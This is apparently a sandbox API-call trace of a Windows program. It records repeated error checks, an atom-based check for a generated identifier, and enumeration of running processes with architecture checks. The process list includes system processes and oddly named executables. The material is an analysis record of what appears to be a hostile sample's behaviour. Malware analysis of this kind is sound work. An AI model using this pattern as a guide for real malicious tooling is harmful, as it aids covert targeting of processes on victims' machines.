	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.520] GetLastError () returned 0x5
	[0133.521] GetLastError () returned 0x5
	[0133.521] GetLastError () returned 0x5
	[0133.521] GetLastError () returned 0x5
	[0133.521] GetLastError () returned 0x5
	[0133.521] GetLastError () returned 0x5
	[0133.521] GetLastError () returned 0x5
	[0133.521] GetLastError () returned 0x5
	[0133.521] GetLastError () returned 0x5
	[0133.521] GetLastError () returned 0x5
	[0133.521] GetLastError () returned 0x5
	[0133.521] GetLastError () returned 0x5
	[0133.521] GetLastError () returned 0x5
	[0133.521] GetLastError () returned 0x5
	[0133.521] GetLastError () returned 0x5
	[0133.521] GetLastError () returned 0x5
	[0133.521] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.521] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0133.521] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0133.521] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.522] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.523] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetLastError () returned 0x5
	[0133.524] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.524] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0133.524] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.525] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0133.525] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0133.525] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0133.525] CloseHandle (hObject=0x2dc) returned 1
	[0133.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0133.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.525] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.525] CloseHandle (hObject=0x2dc) returned 1
	[0133.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.526] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.526] CloseHandle (hObject=0x2dc) returned 1
	[0133.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.526] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.526] CloseHandle (hObject=0x2dc) returned 1
	[0133.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.527] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.527] CloseHandle (hObject=0x2dc) returned 1
	[0133.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0133.527] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.527] CloseHandle (hObject=0x2dc) returned 1
	[0133.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0133.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.572] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.572] CloseHandle (hObject=0x2dc) returned 1
	[0133.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.573] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.573] CloseHandle (hObject=0x2dc) returned 1
	[0133.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0133.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.574] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.574] CloseHandle (hObject=0x2dc) returned 1
	[0133.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.574] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.574] CloseHandle (hObject=0x2dc) returned 1
	[0133.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.575] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.575] CloseHandle (hObject=0x2dc) returned 1
	[0133.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.575] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.575] CloseHandle (hObject=0x2dc) returned 1
	[0133.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.575] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.576] CloseHandle (hObject=0x2dc) returned 1
	[0133.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.576] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.576] CloseHandle (hObject=0x2dc) returned 1
	[0133.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.577] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.577] CloseHandle (hObject=0x2dc) returned 1
	[0133.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.577] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.577] CloseHandle (hObject=0x2dc) returned 1
	[0133.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.577] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.577] CloseHandle (hObject=0x2dc) returned 1
	[0133.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.578] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.578] CloseHandle (hObject=0x2dc) returned 1
	[0133.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.578] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.578] CloseHandle (hObject=0x2dc) returned 1
	[0133.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0133.579] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.579] CloseHandle (hObject=0x2dc) returned 1
	[0133.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0133.579] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.579] CloseHandle (hObject=0x2dc) returned 1
	[0133.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.579] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.580] CloseHandle (hObject=0x2dc) returned 1
	[0133.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.580] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.580] CloseHandle (hObject=0x2dc) returned 1
	[0133.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.580] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.580] CloseHandle (hObject=0x2dc) returned 1
	[0133.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.581] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.581] CloseHandle (hObject=0x2dc) returned 1
	[0133.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.581] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.581] CloseHandle (hObject=0x2dc) returned 1
	[0133.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.582] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.582] CloseHandle (hObject=0x2dc) returned 1
	[0133.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.582] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.582] CloseHandle (hObject=0x2dc) returned 1
	[0133.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0133.582] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.582] CloseHandle (hObject=0x2dc) returned 1
	[0133.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.583] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.583] CloseHandle (hObject=0x2dc) returned 1
	[0133.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.583] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.583] CloseHandle (hObject=0x2dc) returned 1
	[0133.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.584] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.584] CloseHandle (hObject=0x2dc) returned 1
